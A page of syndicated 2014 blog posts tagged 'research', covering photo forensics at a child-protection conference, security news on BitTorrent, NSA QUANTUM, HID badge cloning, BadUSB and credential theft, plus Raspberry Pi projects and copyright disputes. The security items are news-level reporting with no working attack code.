Posts tagged ‘research’

The Hacker Factor Blog: CACC Recap

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

I’m finally back from the Crimes Against Children Conference (CACC) and caught up from a week’s worth of out-of-office backlog.

CACC is a really fascinating conference. The topic is serious, sobering, and definitely not “fun” in the traditional sense. It focuses on child abuse, child exploitation, and related issues. Talks ranged from horrific case studies to setting up a sting operation. (I never thought about it, but the officers waiting behind the door are in a very specific order. The suspect really doesn’t stand a chance when the cops burst through the doorway.) The fun part, to me, is how amazing all of the people at the conference are, how informative the sessions were, and how I literally learned something new everywhere I turned, even at the evening dinner social gathering.

One of the best things I attended was the Forensic Challenge. This was the first year that they did it. They turned a hotel room into a crime scene and let teams work the scene. I was given special permission to sit quietly and observe as one group went through the mocked-up suspect’s apartment. This was way better than anything on TV, and I’m still blown away by everything I saw and learned. For example, one guy interviewed the suspect while the other two tossed the place. They systematically searched everything. One guy started off dropping to the floor and looking under the furniture before checking everything. The end result looked like a tornado went through the scene.

Afterwards, I asked if real crime scenes look as ransacked after being searched. “No,” said the veteran officer who ran the challenge. “This team put stuff back.” (The team that I observed didn’t win, but they did better than most teams and they weren’t even LEOs!)

What am I doing here?

Speakers at CACC are by invitation-only. Last year I was invited to give a talk. This year, I was asked to give four hands-on training sessions.

Some of the conference’s training sessions went for a half-day or a full-day, and most went really deep into their topic. I decided to take a different route and ended up giving an overview: “In 90 minutes I will not make you an expert on digital photo analysis. But I will give you an idea about what can be done and give you a little hands-on experience.”

Understanding digital photo analysis is critical for people who investigate child-related abuses. Telling real photos from computer graphics can make the difference between a conviction and a walk. In some cases, being able to quickly pull information out of pictures can mean the difference between life and death. My tools and methods are specifically designed to speed up the analysis process, rapidly extract critical details, and allow the analyst to accurately reach the correct conclusion with a high degree of confidence.

There will be a quiz

Even though I practiced this talk for months, I was still concerned about the timing. I knew that I had way too much material for the scheduled time. Worse: I didn’t get get the chance to practice in front of a live audience. The first time I actually gave this presentation to a large group was when I walked into the first training session. Yet, the first class ended at exactly 90 minutes. The second class was a little rushed (lots of people had computer troubles at the beginning and that ate nearly 10 minutes), but it still ended on time. And the last two classes were right on schedule. (Whew!)

I did include one surprise in my presentation, just to check their understanding. At the beginning of each class, I showed them a few pictures and asked if they trusted their eyes. Some pictures were real, some were digitally enhanced, and some were completely computer generated. At the end of the talk, I assigned those same pictures to the class (one picture per row of desks) and gave them exactly three minutes to evaluate their assigned image. (Why three minutes? Many photo analysis tools can take hours for an investigator to evaluate results. With my system, a trained person can evaluate a typical photo in under a minute and achieve a high-confidence result. But these students are not fully trained, so I gave then a few extra minutes. Literally: you have three minutes to evaluate one photo.)

After the allotted time, I asked each table for their results. “Table 1: Is that real, digitally enhanced or computer generated?” Someone would shout back “Fake!” I’d then ask “How do you know?” and they would tell me which analyzers and what they saw. I’d do exactly what they said on the big screen and elaborated on the results.

I had been warned that the first training session of the conference would likely be the most alert since everyone was fully rested. But really, the first class stunned me. As a whole, they nailed the pop quiz. The first class even had multiple people per table describing what they found. Despite the fact that I went very quickly though each section, they still understood it enough to ace the quiz.

The second class was right after lunch, so I expected them to be a little lethargic. They got most of the important observations. The other two classes were on the last day of the conference — and after week of lectures and a big late-night social event. Both classes thought that three minutes was not long enough but still did well. (Not bad for covering six complex topics with about 10 minutes per section, and then only given them three minutes to apply what they learned.)

Heuristics and Results

The conference ended on Thursday, but I’ve already begun to hear from people who attended my training classes. Each class had between 25 and 35 people, and I’m thrilled that people found value in my training sessions.

For myself, I took away a lot of ideas. With a little research and work, things I learned from talks on psychology and behavioral analysis may be applicable to digital photo forensics. Even little observations made jokingly over dinner may end up forming valuable heuristics or statistical models. I left the conference with three pages of notes about potential research projects. With any luck, a few will even become future blog topics.

TorrentFreak: Attackers Can ‘Steal’ Bandwidth From BitTorrent Seeders, Research Finds

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

swarmBitTorrent is one of the fastest and most efficient ways to share large files over the Internet. The popular file-sharing protocol is used by dozens of millions of people every day and accounts for a substantial amount of total Internet traffic.

This popularity makes BitTorrent an interesting target for attacks, which various anti-piracy companies have shown in the past. One of these possible attacks was recently unveiled by Florian Adamsky, researcher at the City University London.

In an article published in “Computers & Security” Adamsky and his colleagues reveal an exploit which allows attackers to get a higher download rate from seeders than other people.

In technical terms, the exploit misuses BitTorrent’s choking mechanism of clients that use the “Allowed Fast” extension. Attackers can use this to keep a permanent connection with seeders, requesting the same pieces over and over.

The vulnerability was extensively tested in swarms of various sizes and the researchers found that three malicious peers can already slow download times up to 414.99%. When the number of attackers is greater compared to the number of seeders, the worse the effect becomes.

The impact of the attack further depends on the download clients being used by the seeders in the swarm. The mainline BitTorrent clients and uTorrent are not vulnerable for example, while Vuze, Transmission and Libtorrent-based clients are.

TorrentFreak spoke with Adamsky who predicts that similar results are possible in real swarms. Even very large swarms of more than 1,000 seeders could be affected through a botnet, although it’s hard to predict the precise impact.

“If an attacker uses a botnet to attack the swarm, I think it would be possible to increase the average download time of all peers [of swarms with 1,000 seeders] up to three times,” Adamsky tells us.

“If most of the clients would have a vulnerable client like Vuze or Transmission it would be possible to increase the average download time up ten times,” he adds.

In their paper the researchers suggest a relatively easy fix to the problem, through an update of the “Allowed Fast” extension. In addition, they also propose a new seeding algorithm that is less prone to these and other bandwidth attacks.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: QUANTUM Technology Sold by Cyberweapons Arms Manufacturers

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Last October, I broke the story about the NSA’s top secret program to inject packets into the Internet backbone: QUANTUM. Specifically, I wrote about how QUANTUMINSERT injects packets into existing Internet connections to redirect a user to an NSA web server codenamed FOXACID to infect the user’s computer. Since then, we’ve learned a lot more about how QUANTUM works, and general details of many other QUANTUM programs.

These techniques make use of the NSA’s privileged position on the Internet backbone. It has TURMOIL computers directly monitoring the Internet infrastructure at providers in the US and around the world, and a system called TURBINE that allows it to perform real-time packet injection into the backbone. Still, there’s nothing about QUANTUM that anyone else with similar access can’t do. There’s a hacker tool called AirPwn that basically performs a QUANTUMINSERT attack on computers on a wireless network.

A new report from Citizen Lab shows that cyberweapons arms manufacturers are selling this type of technology to governments around the world: the US DoD contractor CloudShield Technologies, Italy’s Hacking Team, and Germany’s and the UK’s Gamma International. These programs intercept web connections to sites like Microsoft and Google — YouTube is specially mentioned — and inject malware into users’ computers.

Turkmenistan paid a Swiss company, Dreamlab Technologies — somehow related to the cyberweapons arms manufacturer Gamma International — just under $1M for this capability. Dreamlab also installed the software in Oman. We don’t know what other countries have this capability, but the companies here routinely sell hacking software to totalitarian countries around the world.

There’s some more information in this Washington Post article, and this essay on the Intercept.

In talking about the NSA’s capabilities, I have repeatedly said that today’s secret NSA programs are tomorrow’s PhD dissertations and the next day’s hacker tools. This is exactly what we’re seeing here. By developing these technologies instead of helping defend against them, the NSA — and GCHQ and CESG — are contributing to the ongoing insecurity of the Internet.

Related: here is an open letter from Citizen Lab’s Ron Diebert to Hacking Team about the nature of Citizen Lab’s research and the misleading defense of Hacking Team’s products.

Krebs on Security: How Secure is Your Security Badge?

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Security conferences are a great place to learn about the latest hacking tricks, tools and exploits, but they also remind us of important stuff that was shown to be hackable in previous years yet never really got fixed. Perhaps the best example of this at last week’s annual DefCon security conference in Las Vegas came from hackers who built on research first released in 2010 to show just how trivial it still is to read, modify and clone most HID cards — the rectangular white plastic “smart” cards that organizations worldwide distribute to employees for security badges.

HID iClass proximity card.

HID iClass proximity card.

Nearly four years ago, researchers at the Chaos Communication Congress (CCC), a security conference in Berlin, released a paper (PDF) demonstrating a serious vulnerability in smart cards made by Austin, Texas-based HID Global, by far the largest manufacturer of these devices. The CCC researchers showed that the card reader device that HID sells to validate the data stored on its then-new line of iClass proximity cards includes the master encryption key needed to read data on those cards.

More importantly, the researchers proved that anyone with physical access to one of these readers could extract the encryption key and use it to read, clone, and modify data stored on any HID cards made to work with those readers.

At the time, HID responded by modifying future models of card readers so that the firmware stored inside them could not be so easily dumped or read (i.e., the company removed the external serial interface on new readers). But according to researchers, HID never changed the master encryption key for its readers, likely because doing so would require customers using the product to modify or replace all of their readers and cards — a costly proposition by any measure given HID’s huge market share.

Unfortunately, this means that anyone with a modicum of hardware hacking skills, an eBay account, and a budget of less than $500 can grab a copy of the master encryption key and create a portable system for reading and cloning HID cards. At least, that was the gist of the DefCon talk given last week by the co-founders of Lares Consulting, a company that gets hired to test clients’ physical and network security.

Lares’ Joshua Perrymon and Eric Smith demonstrated how an HID parking garage reader capable of reading cards up to three feet away was purchased off of eBay and modified to fit inside of a common backpack. Wearing this backpack, an attacker looking to gain access to a building protected by HID’s iClass cards could obtain that access simply by walking up to a employee of the targeted organization and asking for directions, a light of a cigarette, or some other pretext.

Card cloning gear fits in a briefcase. Image: Lares Consulting.

Card cloning gear fits in a briefcase. Image: Lares Consulting.

Perrymon and Smith noted that, thanks to software tools available online, it’s easy to take card data gathered by the mobile reader and encode it onto a new card (also broadly available on eBay for a few pennies apiece). Worse yet, the attacker is then also able to gain access to areas of the targeted facility that are off-limits to the legitimate owner of the card that was cloned, because the ones and zeros stored on the card that specify that access level also can be modified.

Smith said he and Perrymon wanted to revive the issue at DefCon to raise awareness about a widespread vulnerability in physical security.  HID did not respond to multiple requests for comment.

“Until recently, no one has really demonstrated properly what the risk is to a business here,” Smith said. “SCADA installations, hospitals, airports…a lot of them use HID cards because HID is the leader in this space, but they’re using compromised technology. Your card might not have data center or HR access but I can get into those places within your organization just by coming up to some employee standing outside the building and bumming a light off of him.”

Organizations that are vulnerable have several options. Probably the cheapest involves the use of some type of sleeve for the smart cards. The wireless communications technology that these cards use to transmit data — called radio-frequency identification or RFID – can be blocked when not in use by storing the key cards inside a special RFID-shielding sleeve or wallet. Of course, organizations can replace their readers with newer (perhaps non-HID?) technology, and/or add biometric components to card readers, but these options could get pricey in a hurry.

A copy of the slides from Perrymon and Smith’s DefCon talk is available here.

Krebs on Security: Q&A on the Reported Theft of 1.2B Email Accounts

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

My phone and email have been flooded with questions and interview requests from various media outlets since security consultancy Hold Security dropped the news that a Russian gang has stolen more than a billion email account credentials. Rather than respond to each of these requests in turn, allow me to add a bit of perspective here in the most direct way possible: The Q&A.

Q: Who the heck is Alex Holden?

A: I’ve known Hold Security’s Founder Alex Holden for nearly seven years. Coincidentally, I initially met him in Las Vegas at the Black Hat security convention (where I am now). Alex is a talented and tireless researcher, as well as a forthright and honest guy. He is originally from Ukraine, and speaks/reads Russian and Ukrainian fluently. His research has been central to several of my big scoops over the past year, including the breach at Adobe that exposed tens of millions of customer records.

Q: Is this for real?

A: Alex isn’t keen on disclosing his methods, but I have seen his research and data firsthand and can say it’s definitely for real. Without spilling his secrets or methods, it is clear that he has a first-hand view on the day-to-day activities of some very active organized cybercrime networks and actors.

Q: Ok, but more than a billion credentials? That seems like a lot.

A: For those unfamiliar with the operations of large-scale organized crime syndicates, yes, it does. Unfortunately, there are more than a few successful cybercrooks who are quite good at what they do, and do it full-time. These actors — mostly spammers and malware purveyors (usually both) — focus on acquiring as many email addresses and account credentials as they can. Their favorite methods of gathering this information include SQL injection (exploiting weaknesses in Web sites that can be used to force the site to cough up user data) and abusing stolen credentials to steal even more credentials from victim organizations.

One micro example of this: Last year, I wrote about a botnet that enslaved thousands of hacked computers which disguised itself as a legitimate add-on for Mozilla Firefox and forced infected PCs to scour Web sites for SQL vulnerabilities.

Q: What would a crime network even do with a billion credentials?

A: Spam, spam and….oh, spam. Junk email is primarily sent in bulk using large botnets — collections of hacked PCs. A core component of the malware that powers these crime machines is the theft of passwords that users store on their computers and the interception of credentials submitted by victims in the process of browsing the Web. It is quite common for major spammers to rely on lists of billions of email addresses for distributing their malware and whatever junk products they are getting paid to promote.

Another major method of spamming (called “Webspam”) involves the use of stolen email account credentials — such as Gmail, Yahoo and Outlook — to send spam from victim accounts, particularly to all of the addresses in the contacts list of the compromised accounts.

Spam is such a core and fundamental component of any large-scale cybercrime operation that I spent the last four years writing an entire book about it, describing how these networks are created, the crooks that run them, and the cybercrime kingpins who make it worth their while. More information about this book and ways to pre-order it before its release in November is available here.

Q: Should I be concerned about this? 

A: That depends. If you are the type of person who re-uses passwords at multiple sites — including email accounts — then the answer is yes. If you re-use your email password at another site and that other site gets hacked, there is an excellent chance that cyber crooks are plundering your inbox and using it to spam your friends and family to spread malware and to perpetuate the cybercrime food chain.

For a primer that attempts to explain the many other reasons that crooks might want to hack your inbox, your inbox’s relative market value, and what you can do to secure it, please see The Value of a Hacked Email Account and Tools for a Safer PC.

Got more questions? Sound off in the comments section and I’ll try to address them when time permits.

Update: As several readers have pointed out, I am listed as a special advisor to Hold Security on the company’s Web site. Mr. Holden asked me to advise him when he was setting up his company, and asked if he could list me on his site. However, I have and will not receive any compensation in any form for said advice (most of which, for better or worse, so far has been ignored).

Your email account may be worth far more than you imagine.

Your email account may be worth far more than you imagine.

Raspberry Pi: Mathematica 10 – now available for your Pi!

This post was syndicated from: Raspberry Pi and was written by: Liz Upton. Original post: at Raspberry Pi

Liz: If you use Raspbian, you’ll have noticed that Mathematica and the Wolfram Language come bundled for free with your Raspberry Pi. (A little boast here: we were only the second computer ever on which Mathematica has been included for free use as standard. The first? Steve Jobs’s NeXT, back in 1988.) 

Earlier in July, Wolfram Research announced a big update to Mathematica, with the introduction of Mathematica 10. Here’s a guest post announcement from Arnoud Buzing at Wolfram about what the new Mathematica will offer those of you who use it on your Raspberry Pi. Over to you, Arnoud!

In July, we released Mathematica 10a major update to Wolfram’s flagship desktop product. It contains over 700 new functions, and improvements to just about every part of the system.

wolfram-rasp-pi2

Today I am happy to announce an update for Mathematica and the Wolfram Language for the Raspberry Pi, which bring many of those features to the Raspberry Pi.

To get this new version of the Wolfram Language, simply run this command in a terminal on your Raspberry Pi:

sudo apt-get update && sudo apt-get install wolfram-engine

This new version will also come pre-installed in the next release of NOOBS, the easy set-up system for the Raspberry Pi.

If you have never used the Wolfram Language on the Raspberry Pi, then you should try our new fast introduction for programmers, which is a quick and easy way to learn to program in this language. This introduction covers everything from using the interactive user interface, basic evaluations and expressions, to more advanced topics such as natural language processing and cloud computation. You’ll also find a great introduction to the Wolfram Language in the Raspberry Pi Learning Resources.

This release of the Wolfram Language also includes integration with the newly released Wolfram Cloud. This technology allows you to do sophisticated computations on a remote server, using all of the knowledge from Wolfram|Alpha and the Wolfram Knowledgebase. It lets you define custom computations and deploy them as a “instant API” on the cloud. The Wolfram Cloud is available with a free starter account, and has additional non-free accounts which enable additional functionality.

Check the Wolfram Community in the next couple of weeks for new examples which show you how to use the Wolfram Language with your Raspberry Pi.

Schneier on Security: The Fundamental Insecurity of USB

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

This is pretty impressive:

Most of us learned long ago not to run executable files from sketchy USB sticks. But old-fashioned USB hygiene can’t stop this newer flavor of infection: Even if users are aware of the potential for attacks, ensuring that their USB’s firmware hasn’t been tampered with is nearly impossible. The devices don’t have a restriction known as “code-signing,” a countermeasure that would make sure any new code added to the device has the unforgeable cryptographic signature of its manufacturer. There’s not even any trusted USB firmware to compare the code against.

The element of Nohl and Lell’s research that elevates it above the average theoretical threat is the notion that the infection can travel both from computer to USB and vice versa. Any time a USB stick is plugged into a computer, its firmware could be reprogrammed by malware on that PC, with no easy way for the USB device’s owner to detect it. And likewise, any USB device could silently infect a user’s computer.

These are exactly the sorts of attacks the NSA favors.

Raspberry Pi: Sonic Pi Competition

This post was syndicated from: Raspberry Pi and was written by: Carrie Anne Philbin. Original post: at Raspberry Pi

Coding music on a Raspberry Pi with Sonic Pi has quickly become a great way to learn programming concepts and to pump out some thumping beats. Last year I worked with Dr Sam Aaron, live coder and academic at the University of Cambridge, to teach KS3 pupils text-based programming on Raspberry Pis as part of their ICT & Computing lessons. Since then Sonic Pi has proved incredibly popular in classrooms worldwide. The scheme of work we used is available for free in the ‘Teach’ section of our resources for any educator wanting to teach computer programming in a fun way.

sonicpi2

Since our classroom collaboration, Sam has been busy working on Sonic Pi version 2.0 and together we have been wowing attendees of Picademy with the potential of Sonic Pi for the classroom. We have also been working on Sonic Pi: Live & Coding, a digital research project to turn a Raspberry Pi into a musical instrument with Sonic Pi, working with schools, artists, academics and the Cambridge Junction, which will culminate in a Sonic Pi: Live & Coding Summit this November. In fact, this week at the Cambridge Junction, 60 children have been participating in the project, having coding music battles, and jamming with musicians.

Sonic Pi

Push Sam’s buttons and watch his eyes pop at Sonic Pi Live and Coding!

To coincide with the summit, we will be launching a Sonic Pi: Live & Coding competition in September to find the best original sonic pi composition created by a child or young person in three age categories. We will have a significant number of Raspberry Pis to give away at random for those who take part, and the semi-finalists of the competition will be invited to perform their original work live at the summit in November in front of an audience and panel of judges to potentially be crowned the first ever Sonic Pi Competition winner!

So what are you waiting for? Download Sonic Pi version 2 for your Raspberry Pi by following these instructions, and then take a look at the Sonic Pi 2 article by Sam in the MagPi magazine, and our new Sonic Pi Version 2 Getting Started resource. Take this opportunity to practice and get a head start on the competition!

Get your pratice in for the Sonic Pi version 2 competition with our new resource.

Get your practice in for the Sonic Pi version 2 competition with our new resource.

TorrentFreak: Google Protects Chilling Effects From Takedown Notices

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

google-bayEach week many millions of DMCA-style copyright notices are sent to sites and services around the planet. Initially the process flew almost entirely under the radar, with senders and recipients dealing with complaints privately.

In 2001, that began to change with the advent of Chilling Effects, an archive created by activists who had become concerned that increasing volumes of cease-and-desist letters were having a “chilling effect” on speech.

In the decade-and-a-third that followed the archive grew to unprecedented levels, with giants such as Google and Twitter routinely sending received notices to the site for public retrieval.

However, while Chilling Effects strives to maintain free speech, several times a month rightsholders from around the world (probably unintentionally) try to silence the archive in specific ways by asking Google to de-index pages from the site.

As can be seen from the tables below, Home Box Office has tried to de-index Chilling Effects pages 240 times, with Microsoft and NBC Universal making 99 and 65 attempts respectively.

Chilling1

The ‘problem’ for these copyright holders is two-fold. Firstly, Chilling Effects does indeed list millions of URLs that potentially link to infringing content. That does not sit well with copyright holders.

“Because the site does not redact information about the infringing URLs identified in the notices, it has effectively become the largest repository of URLs hosting infringing content on the internet,” the Copyright Alliance’s Sandra Aistars complained earlier this year.

However, what Aistars omits to mention is that Chilling Effects has a huge team of lawyers under the hood who know only too well that their archive receives protection under the law. Chilling Effects isn’t a pirate index, it’s an educational, informational, research resource.

Thanks to Google, which routinely throws out all attempts at removing Chilling Effects URLs from its indexes, we are able to see copyright holder attempts at de-indexing.

Earlier this month, for example, Wild Side Video and their anti-piracy partners LeakID sent this notice to Google aiming to protect their title “Young Detective Dee.” As shown below, the notice contained several Chilling Effects URLs.

chill2

Each URL links to other DMCA notices on Chilling Effects, each sent by rival anti-piracy outfit Remove Your Media on behalf of Well Go USA Entertainment. They also target “Young Detective Dee”. This is an interesting situation that offers the potential for an endless loop, with the anti-piracy companies reporting each others’ “infringing” links on Chilling Effects in fresh notices, each time failing to get them removed.

chilling3

The seeds of the “endless loop” phenomenon were also experienced by HBO for a while, with the anti-piracy company sending notices (such as this one) targeting dozens of Chilling Effects pages listing notices previously sent by the company.

While publishing notices is entirely legal, the potential for these loops really angers some notice senders.

On April 10 this year a Peter Walley sent a notice to Google complaining that his book was being made available on a “pirate site” without permission. Google removed the link in its indexes but, as is standard practice, linked to the notice on Chilling Effects. This enraged Walley.

chilling4

None of these rantings had any effect, except to place yet another notice on Chilling Effects highlighting where the infringing material could be found.

It’s a lesson others should learn from too.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: “Internet scanning project” scans, (Sat, Jul 26th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A reader, Greg, wrote in with a query on another internet scanning project. He checked out the IP address and it lead to a web site, www[.]internetscanningproject.org, which states:

“Hello! You’ve reached the Internet Scanning Project.

We’re computer security researchers performing periodic Internet-wide health assessments.

If you reached this site because of activity you observed on your network:

We apologize for any concern caused by our network activity. We are not specifically targeting your network.

We have not attempted to unlawfully access or abuse your network in any way. We are exclusively accessing publicly available servers, we respect all authentication barriers, and (as you can see) we have made no attempt to hide our activity.

This effort is part of a research project in which we are engaged in with view to possibly contributing to public Internet health datasets. We believe research of this sort is both legal and beneficial to the security of the Internet as a whole.

However, if you wish to be excluded from our scanning efforts after reading the clarifying information below, please email us with IP addresses or CIDR blocks to be added to our blacklist.”

It does not provide any information or assurances that this is a legitimate research project and I wouldn’t be want to sending information to unknown people via an unattributable web site. The normal low level open source searching doesn’t reveal anything of use or attribution either. It does, however, bring up a fair number hits of people asking what are these scans and the best way to block them.

It appears this scanning has been running for a couple of weeks and has being using multiple IP addresses (see https://isc.sans.edu/topips.txt for some examples). A curious point, for a “legitimate” scan, is that they have started changed the User Agent frequently and in some cases to some very odd nonsensical strings. The core scans are against TCP ports 21, 22 and 443 and the 443 scans may trigger alerts for probing on the Heartbleed bug.

Chris Mohan — Internet Storm Center Handler on Duty

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Raspberry Pi: Pi in the Sky: hardware for high-altitude balloonists from Dave Akerman

This post was syndicated from: Raspberry Pi and was written by: Liz Upton. Original post: at Raspberry Pi

Liz: Regular readers will be very familiar with the name Dave Akerman. Dave has been sending Raspberry Pis to the stratosphere under weather balloons since we launched the Pi in 2012, and his work in helping schools develop their own in-house space programs has been fantastic to watch. He and his friend Anthony Stirk have just produced a telemetry add-on board for the Raspberry Pi to help schools (and everybody else) reproduce the sort of spectacular results you’ve seen from him before. Here he is to introduce it: over to you, Dave!

High Altitude Ballooning is an increasingly popular hobby (I nearly said that interest has been “ballooning”, but fortunately I stopped myself just in time …), bringing what is termed “near space” within the reach of pretty much anyone who is willing to put in the effort and spend a moderate amount of money.

moon and sky from stratosphere

 

Although it’s possible to successfully fly and retrieve a balloon with a simple GSM/GPS tracker, the chances are that this will end in failure and tears. GSM coverage in the UK is nowhere near 100%, especially in rural areas which is where we want (and aim) the flights to land. The next step up, in reliability and price, is a “Spot” tracker which works solely via satellites, but those don’t work if they land upside down. Also, neither of these solutions will tell you how high the flight got, or record any science data (e.g. temperature, pressure), or indeed tell you anything about the flight until they land. If you’re lucky. A lost flight is a sad thing indeed.

pic from stratosphere

 

For some countries (e.g. USA, but not the UK), if you are a licensed amateur radio operator you can fly an APRS tracker, in which case the flight will be tracked for you via the ground-based APRS network run by other radio hams. Sadly UK laws prohibit radio hams transmitting from an airborne vehicle, so APRS is out for us.

For these reasons, pretty much everyone involved in the hobby in the UK, and many other countries, uses radio trackers operating in an ISM (Industrial, Scientific and Medical) band where airborne usage is allowed. These work throughout the flight, transmitting GPS co-ordinates plus temperature and anything else that you can add a sensor for. Many radio trackers can also send down live images, meaning that you can see what your flight is seeing without having to wait for it to land. Here’s a diagram showing how telemetry from the flight ends up as a balloon icon on a Google map:

tracking system

 

What’s not shown here is that, provided you tell them, the other balloonists will help track for you. So not only will you be receiving telemetry and images directly via your own radio receiver, but others will do to. All received data is collated on a server so if you do lose contact with the flight briefly then it doesn’t matter. However, this does not mean you can leave the tracking up to others! You’ll need to receive at the launch site (you have to make sure it’s working!) and also in the chase car once it lands. The expense of doing this is small – a TV dongle for £12 or so will do it, with a £15 aerial and a laptop, ideally with a 3G dongle or tethered to a phone.

Traditionally, balloonists build their own radio trackers, and for anyone with the skills or the time and ability to learn programming and some digital electronics, this is definitely the most rewarding route to take. Imagine receiving pictures of the Earth from 30km up, using a piece of kit that you designed and built and programmed! So if you are up to this challenge (and I suspect that most people reading are) then I recommend that you do just that. It takes a while, but during the development you’ll have plenty of time to research other aspects of the hobby (how to predict the flight path, and obtain permission, and fill the balloon, etc.). And when you’re done, you can hold in your hand something that is all your own work and has, to all intents and purposes, been to space.

weather balloon bursting

 

For some though, it’s just not practical to develop a new tracker. Or you might be a programming whizz, but not know which end of a soldering iron to pick up. It was with these people in mind that we (myself and Anthony Stirk – another high altitude balloonist) developed our “Pi In The Sky” telemetry board. Our principle aim is to enable schools to launch balloon flights with radio trackers, without having to develop the hardware and software first. It is also our hope that older children and students will write their own software or at least modify the provided (open source) software, perhaps connecting and writing code for extra sensors (the board has an i2c connection for add-ons).

The board and software are based on what I’ve been flying since my first “Pi In The Sky” flight over 2 years ago, so the technology has been very well proven (approximately 18 flights and no losses other than deliberate ones!). So far the board itself has clocked up 5 successful flights, with the released open-source software on 3 of those. Here’s the board mounted to a model B (though we very strongly recommend use of a model A, which consumes less power and weighs less):

Pi in the Sky board

It comes in a kit complete with a GPS antenna, SMA pigtail (from which you can easily make your own radio aerial), stand-offs for a rigid mounting to the Pi board, and battery connectors. Software is on https://github.com/piinthesky, with installation instructions at http://www.pi-in-the-sky.com/index.php?id=support, or there is a pre-built SD card image for the tragically lazy. We do recommend manual installation as you’ll learn a lot.

By now you’re probably itching to buy a board and go fly it next weekend. Please don’t. Well, buy the board by all means, but from the moment you decide that this is the project for you, you should task yourself with finding out all you can about how to make your flight a safe success. For a start, this means learning about applying for flight permission (which, if you want to launch from your garden at the end of an airport runway, isn’t going to be given). Permission is provided together with a NOTAM (NOtice To AirMen) which tells said pilots what/where/when your launch will be, so they can take a different path. You also need to learn about predicting the flight path so that it lands well away from towns or cities or motorways or airports. I hope I don’t need to explain how important all of this is.

IMG_0690-e1404813775746-768x1024

 

There’s lots more to learn about too, for example:

  • How to track the flight
  • How to fill a balloon
  • Where to buy the balloon
  • What size balloon? What size parachute? How to tie it all together?

None of this is complicated (it’s not, ahem “rocket science”), but there is a lot to know. Don’t be surprised if the time between “I’ll do it!” and “Wow, I did it!” is measured in months. Several of them. In fact, worry if it’s less than that – this research takes time. We will be producing some teaching materials, but meantime please see the following links:

As for the board, it provides a number of features borne out of a large number of successful flights:

  • Efficient built-in power regulator providing run time of over 20 hours from 4 AA cells (using a model A Pi)
  • Highly sensitive UBlox GPS receiver approved for altitudes up to 50km
  • Temperature compensated, license-free (Europe) frequency agile, 434MHz radio transmitter
  • Temperature sensor
  • Battery voltage monitoring
  • Sockets for external i2c devices, analog input, external temperature sensor
  • Allows use of Raspberry Pi camera
  • Mounting holes and spacers for a solid connection to the Pi

The open-source software provides these features:

  • Radio telemetry with GPS and sensor data using UKHAS standard
  • Radio image download using SSDV standard
  • Multi-threaded to maximize use of the radio bandwidth
  • Variable image size according to altitude
  • Stores full-definition images as well as smaller transmitted images
  • Automatically chooses better images for download
  • Configurable via text file in the Windows-visible partition of the SD card
  • Supplied as github repository with instructions, or SD card image

Finally, anyone interested in high altitude ballooning, using our board or not, should come to the UKHAS Conference on 16th August 2014 at the University of Greenwich. Anthony and I will be presenting our board during the morning sessions, and will run a workshop on the board in the afternoon. For tickets click here.

The Hacker Factor Blog: A Victory for Fair Use

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

Last week I reported on a copyright infringement letter that I had received from Getty Images. The extremely hostile letter claimed that I was using a picture in violation of their copyright, ordered me to “cease and desist” using the picture, and demanded that I pay $475 in damages. Various outlets have referred to this letter as trolling and extortion.

Not being an attorney, I contacted my good friend, Mark D. Rasch. Mark is a well-known attorney in the computer security world. Mark headed the United States Department of Justice Computer Crime Unit for nine years and prosecuted cases ranging from computer crime and fraud to digital trespassing and viruses. If you’re old enough, then you remember the Hanover Hackers mentioned in The Cuckoo’s Egg, Robert Morris Jr. (first Internet worm), and Kevin Mitnick — Mark worked all of those prosecutions. He regularly speaks at conferences, appears in news interviews, and has taught cyberlaw to law enforcement and big universities. (If I were a big company looking for a chief privacy officer, I would hire him in a second.)

This letter from Getty had me concerned. But I can honestly say that, in the 12 years that I’ve known him, I have never seen Mark so animated about an issue. I have only ever seen him as a friendly guy who gives extremely informative advice. This time, I saw a side of Mark that I, as a friend, have never experienced. I would never want to be on the other side of the table from him. And even being on the same side was really intimidating. (Another friend told me that Mark has a reputation for being an aggressive bulldog. And this was my first time seeing his teeth.) His first advice to me was very straightforward. He said, “You have three options. One, do nothing. Two, send back a letter, and three, sue them.” Neither of us were fond of option #1. After a little discussion, I decided to do option #2 and prepare for #3.

First I sent the response letter. Then I took Mark’s advice and began to prepare for a lawsuit. Mark wanted me to take the initiative and file for a “Copyright Declaratory Judgment“. (Don’t wait for Getty.) In effect, I wanted the court to declare my use to be Fair Use.

Getty’s Reply

I honestly expected one of three outcomes from my response letter to Getty Images. Either (A) Getty would do nothing, in which case I would file for the Declaratory Judgment, or (B) Getty would respond with their escalation letter, demanding more money (in which case I would still file for the Declaratory Judgment), or (C) Getty would outright sue me, in which case I would respond however my attorney advised.

But that isn’t what happened. Remarkably, Getty backed down! Here’s the letter that they sent me (I’m only censoring email addresses):

From: License Compliance
To: Dr. Neal Krawetz
Subject: [371842247 Hacker Factor ]
Date: Tue, 22 Jul 2014 20:51:13 +0000

Dr. Krawetz:

We have reviewed your email and website and are taking no further action. Please disregard the offer letter that has been presented in this case. If you have any further questions or concerns, please do not hesitate to contact us.

Nancy Monson
Copyright Compliance Specialist
Getty Images Headquarters
605 Fifth Avenue South, Suite 400
Seattle WA 98104 USA
Phone 1 206 925 6125
Fax 1 206 925 5001
[redacted]@gettyimages.com

For more information about the Getty Images License Compliance Program, please visit http://company.gettyimages.com/license-compliance

Helpful information about image copyright rules and how to license stock photos is located at www.stockphotorights.com and Copyright 101.

